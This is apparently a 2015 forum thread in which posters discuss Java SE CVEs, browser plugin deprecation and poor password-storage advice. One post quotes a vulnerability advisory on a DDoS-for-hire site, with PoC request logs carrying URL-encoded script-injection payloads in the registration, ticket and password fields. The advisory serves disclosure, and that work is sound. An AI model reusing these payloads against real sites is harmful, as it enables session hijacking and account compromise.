Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.
 
  • Locked thread
spankmeister
Jun 15, 2008






Does anyone have the skinny on those Java CVE's?

CVE-2014-6601 Java SE Multiple Hotspot Yes 10.0 Network Low None Complete Complete Complete Java SE 6u85, Java SE 7u72, Java SE 8u25 See Note 1
CVE-2015-0412 Java SE Multiple JAX-WS Yes 10.0 Network Low None Complete Complete Complete Java SE 6u85, Java SE 7u72, Java SE 8u25 See Note 1
CVE-2014-6549 Java SE Multiple Libraries Yes 10.0 Network Low None Complete Complete Complete Java SE 8u25 See Note 1
CVE-2015-0408 Java SE Multiple RMI Yes 10.0 Network Low None Complete Complete Complete Java SE 5.0u75, Java SE 6u85, Java SE 7u72, Java SE 8u25 See Note 1

RCE with admin rights but doesn't the Java process itself need to be run as admin for that to work?

Adbot
ADBOT LOVES YOU

faxlore
Sep 24, 2014

a blue star tattoo for you!

probably why they're listed as low, RCEs are usually :supaburn:

prefect
Sep 11, 2001

No one, Woodhouse.
No one.




Dead Man’s Band

infernal machines posted:

some people are going to die, horribly.

spankmeister
Jun 15, 2008






faxlore posted:

probably why they're listed as low, RCEs are usually :supaburn:

Oh no that's complexity. :getin:

They've CVSS 10, the highest.

faxlore
Sep 24, 2014

a blue star tattoo for you!

I retract what I said and replace it with "o jeez"

Malloc Voidstar
May 7, 2007

Fuck the cowboys. Unf. Fuck em hard.
https://rhn.redhat.com/errata/RHSA-2015-0069.html

A flaw was found in the way the Hotspot component in OpenJDK verified bytecode from the class files. An untrusted Java application or applet could possibly use this flaw to bypass Java sandbox restrictions. (CVE-2014-6601)

Multiple improper permission check issues were discovered in the JAX-WS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2015-0412, CVE-2014-6549, CVE-2015-0408)

A flaw was found in the way the Hotspot garbage collector handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions. (CVE-2015-0395)

It was discovered that the SSL/TLS implementation in the JSSE component in OpenJDK failed to properly check whether the ChangeCipherSpec was received during the SSL/TLS connection handshake. An MITM attacker could possibly use this flaw to force a connection to be established without encryption being enabled. (CVE-2014-6593)

BangersInMyKnickers
Nov 3, 2004

I have a thing for courageous dongles

thank goodness I am forever stuck on java 7 due to poo poo devs and these CVE's don't apply to me!

Malloc Voidstar
May 7, 2007

Fuck the cowboys. Unf. Fuck em hard.
https://rhn.redhat.com/errata/RHSA-2015-0068.html
here's the java 7 version of that list

Workaday Wizard
Oct 23, 2009

by Pragmatica
are there architectural/technical reason why there are so many java exploits or is it just because they are a big, popular target

Wiggly Wayne DDS
Sep 11, 2010



Shinku ABOOKEN posted:

are there architectural/technical reason why there are so many java exploits or is it just because they are a big, popular target
its poo poo

Munkeymon
Aug 14, 2003

Motherfucker's got an
armor-piercing crowbar! Rigoddamndicu𝜆ous.




why even the gently caress are they using doubleclick tracking

I just can't even



lol

Notorious b.s.d.
Jan 25, 2003

by Reene

Shinku ABOOKEN posted:

are there architectural/technical reason why there are so many java exploits or is it just because they are a big, popular target

you'll notice virtually all the exploits pertain to untrusted code running in the sandbox

it's not like anyone else has really solved the problem of downloading untrusted code from the internet and executing it safely. (google thinks they have, but lol)

Notorious b.s.d.
Jan 25, 2003

by Reene
also, beyond the fundamental issue of lol sandboxing: client-side java is dead.

oracle doesn't really care about client side java and penetration rates have fallen through the floor. (sure, most desktops still have java plugins / java web start, but no mobile devices do)

Jewel
May 2, 2009

isnt chrome like getting rid of java (and iirc unity embed) support within the year or did i imagine that

spankmeister
Jun 15, 2008






i uninstalled java on my desktop pc ages ago and haven't missed it once

cinci zoo sniper
Mar 15, 2013




Jewel posted:

isnt chrome like getting rid of java (and iirc unity embed) support within the year or did i imagine that
they will block all npapi plugins by default somewhere this month, according to last years november, support will be disabled in april and support will be removed in september

Notorious b.s.d.
Jan 25, 2003

by Reene
chrome blocking npapi is ridiculous

chrome will still have lovely plugins, they are just trying to force everyone to use chrome's proprietary plugin architecture: "native messaging" and "native client."

nacl and messaging have failed to set the world on fire because it turns out that people don't want to invest time/money on a codebase that can only support one browser, ever.

spankmeister
Jun 15, 2008






yet its rumored that the new ie (spartan) will support chrome native plugins

Main Paineframe
Oct 27, 2010

Shinku ABOOKEN posted:

are there architectural/technical reason why there are so many java exploits or is it just because they are a big, popular target

both. it's a big popular target which is technically and architecturally poo poo

Pinterest Mom
Jun 9, 2009

is minecraft still java

cinci zoo sniper
Mar 15, 2013




Pinterest Mom posted:

is minecraft still java
yes

ate shit on live tv
Feb 15, 2004

by Azathoth

anthonypants posted:

uhhhhhhhh this is kind of a security fuckup

Social Engineering will work forever.

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender

quote:

Product & Service Introduction:
===============================
The product, called Lizard Stresser is a stress tester that might let you see how your own network stands up to DDoS attacks,
like the ones that interrupted the gaming networks for several days last week. DDoS attacks basically overload servers with
massive amounts of bogus requests.

(Copy of the Homepage: https://lizardstresser.su/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official LizardSquad DDoS Stresser online-service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-01-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
LizardSquad
Product: DDoS Stresser - Web Application (Online-Service) 2015 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
Multiple web vulnerabilities has been discovered in the official LizardSquad `Stresser DDoS Service` web-application.

1.1
The 1st vulnerability is located in `username` value of the registration module. A user can register a script code as payload
to the name values. The ddos web-service of the input on registration uses the wrong conditions to encode and parse. Thus allows
to execute the injected script code in the `./ref` module of the service. The request method to inject is POST and the
vulnerability is located on the application-side of the ddos stresser service. The main administrators are able to see the user
passwords, by watching the logs of an compromised server you see that they can switch by login in through the registered user accounts.
This is possible because of plain transfered passwords in the ddos application. The known event can be used to prepare malicious code
that executes function in connection with application-side injected script codes. The vulnerable file to inject the code is the
register.php file. Another execution of the injected script code occurs in the main dashboard (left sidebar) were the username
is getting visible.

Vulnerable Module(s):
[+] Registration (./ref)

Vulnerable Parameter(s):
[+] username

Affected Module(s):
[+] Dashboard (Username in Left Sidebar)


1.2
The 2nd vulnerability is located in the Ticket Title & Ticket Content input fields of the `Tickets` (tickets) module. A fresh registered
user account is able to inject own malicious persistent script code to the ticket input fields to exploit a backend administrator account.
After an attacker registers and inject own script code to the ticket system he is able to get the ip of the backend users or can compromise
the session data of moderators/administrators. The inject occurs in the `./tickets` module. The execution takes place locally in the listed
open ticket items of the backend. Remote attackers are also able to access other tickets and stored information by intercepting the session
of the add Ticket POST method request.

Vulnerable Module(s):
[+] Tickets (./tickets)

Vulnerable Parameter(s):
[+] name (servername)

1.3
The 3rd vulnerability is located in the target server `name` value. The attacker uses the device or servername to send malicious data to the
ddos application control panel. A remote attacker can change the server or device name value to a script code payload that executes in the
panel (server target list). The service syncs the the device/server name value after the infection but also if the attacker syncs the
data manually. In case of usage macOS to attack it is possible to change the servername easily to a malicious script code payload that
affects the ddos control panel.

Vulnerable Module(s):
[+] server list

Vulnerable Parameter(s):
[+] name (servername)

1.4
The 4th vulnerability is located in the `dasboard > user settings > change password` module. The data in the POST method to change the own
account password is send in plain-text. Thus allows remote attackers and network administors to capture compromised accounts. The service can
also be observed by man-in-the-middle attacks in the local network.

Vulnerable Module(s):
[+] dasboard > user settings > change password


1.5
The 5th vulnerability is also located in the `dasboard > user settings > change password` module. The POST method request of the change function in the
ddos application can be intercepted by attackers to compromise the service. The remote attacker logs in as user and intercepts the session information by
changing to an existing user account. Successul exploitation of the session tampering issues results in account system compromise (administrators/customers).

Vulnerable Module(s):
[+] dasboard > user settings > change password

Vulnerable Parameter(s):
[+] id


Proof of Concept (PoC):
=======================
1.1
--- PoC Session Logs [POST] (Injection) ---
Status: 200[OK]
POST http://lizardstresser.su/usercp Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[lizardstresser.su]
User-Agent[Mozilla/5.0

(Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer

[http://lizardstresser.su/usercp]
Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
Connection[keep-alive]
POST-Daten:
cpassword[chaos666]
npassword[http%3A%2F

%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
rpassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
updatePassBtn[Change+Stored+Data%21]
Response Header:
Date[Tue, 20 Jan 2015

10:29:21 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]


Pragma[no-cache]
Server[cloudflare-nginx]
CF-RAY[1aba972a06dd15b3-FRA]
Content-Encoding[gzip]
-
Status: 302[Moved Temporarily]
POST https://lizardstresser.su/register.php
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[lizardstresser.su]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://lizardstresser.su/register.php]
Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
Connection[keep-alive]
POST-Daten:
username[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2]
password[chaos666]
rpassword[chaos666]
email[research%40vulnerbaility-lab.com]
ref[%2F]
checkbox1[1]
register[Register]
Response Header:
Server[cloudflare-nginx]
Date[Tue, 20 Jan 2015 11:20:02 GMT]
Content-Type[text/html]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Location[/purchase]
CF-RAY[1abae168238f15b3-FRA]
X-Firefox-Spdy[3.1]


Reference(s):
http://lizardstresser.su/?r=imgsrcx2020iframesrca20iframe
https://lizardstresser.su/register.php


1.2
--- PoC Session Logs [POST] (Injection) ---
Status: 200[OK]
POST http://lizardstresser.su/ajax/addticket.php
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[lizardstresser.su]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://lizardstresser.su/tickets]
Content-Length[324]
Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
title2[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
code[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
content[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
hash[JMX02SbuIwklRiGPAVDgeOC5nTs41xFp]
Response Header:
Date[Tue, 20 Jan 2015 10:30:54 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Server[cloudflare-nginx]
CF-RAY[1aba996d3d7115b3-FRA]
Content-Encoding[gzip]

Reference(s):
http://lizardstresser.su/ajax/addticket.php

DumbWhiteGuy
Jul 4, 2007

You need haters. Fellas if you got 20 haters, you need 40 of them motherfuckers. If there's any haters in here that don't have nobody to hate on, feel free to hate on me

Wittle babbys first ddos tool

spankmeister
Jun 15, 2008







5

cinci zoo sniper
Mar 15, 2013




oh yeah, we can start security fuckup forecast 2015
in case you missed presentation of poop x
windows-as-a-service

kitten emergency
Jan 13, 2008

get meow this wack-ass crystal prison

5

Peanut and the Gang
Aug 24, 2009

by exmarx
Hack the DDoS website so that it unleashes patches to all the hacked routers it uses.

Bhodi
Dec 9, 2007

Oh, it's just a cat.
Pillbug

Shinku ABOOKEN posted:

are there architectural/technical reason why there are so many java exploits or is it just because they are a big, popular target

Java is the malware compatibility layer for... everything.

canis minor
May 4, 2011


quote:

Write Once, Poop Anywhere

Volmarias
Dec 31, 2002

EMAIL... THE INTERNET... SEARCH ENGINES...

Please don't mock my code style tia

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender
So I am at an afternoon thing on writing secure applications and the presenter just suggested using AES to store passwords.
I am about to leave.

Luigi Thirty
Apr 30, 2006

Emergency confection port.

a couple years ago someone made a site with a JavaScript emulation of a custom microcontroller that powered a bunch of virtual devices you had to hack, complete with data sheets for everything. is that site still around? I don't remember what it's called

spankmeister
Jun 15, 2008






Luigi Thirty posted:

a couple years ago someone made a site with a JavaScript emulation of a custom microcontroller that powered a bunch of virtual devices you had to hack, complete with data sheets for everything. is that site still around? I don't remember what it's called

ruckingenur and matasano microcorruption come to mind

minato
Jun 7, 2004

cutty cain't hang, say 7-up.
Taco Defender

OSI bean dip posted:

So I am at an afternoon thing on writing secure applications and the presenter just suggested using AES to store passwords.
Are you objecting because they should have suggested a one-way hash, or because it's for a keystore like Keepass/Lastpass and you have a problem with AES?

Arcsech
Aug 5, 2008

OSI bean dip posted:

So I am at an afternoon thing on writing secure applications and the presenter just suggested using AES to store passwords.
I am about to leave.

owned


minato posted:

Are you objecting because they should have suggested a one-way hash, or because it's for a keystore like Keepass/Lastpass and you have a problem with AES?

probably the first one, a keystore is an exception rather than the rule

Raluek
Nov 3, 2006

WUT.

spankmeister posted:

i uninstalled java on my desktop pc ages ago and haven't missed it once

the supermicro (aten) ipmi ikvm dealy in one of my machines needs java to control the virtual console. i wonder how terribly insecure it is. good thing its not dmzd or anything

cinci zoo sniper
Mar 15, 2013




OSI bean dip posted:

So I am at an afternoon thing on writing secure applications and the presenter just suggested using AES to store passwords.
I am about to leave.
mindgame the system. use aes hashes as passwords

Lain Iwakura
Aug 5, 2004

The body exists only to verify one's own existence.

Taco Defender

minato posted:

Are you objecting because they should have suggested a one-way hash, or because it's for a keystore like Keepass/Lastpass and you have a problem with AES?

It was for a web app.

I asked him about it during Q&A and he was like "oh I thought AES 2 worked.".

:psyduck:

Adbot
ADBOT LOVES YOU

spankmeister
Jun 15, 2008






Raluek posted:

the supermicro (aten) ipmi ikvm dealy in one of my machines needs java to control the virtual console. i wonder how terribly insecure it is. good thing its not dmzd or anything

Yeah supermicro has a stand alone version of their terrible software available complete with packaged java. when I still dealt with supermicro I used that.

  • Locked thread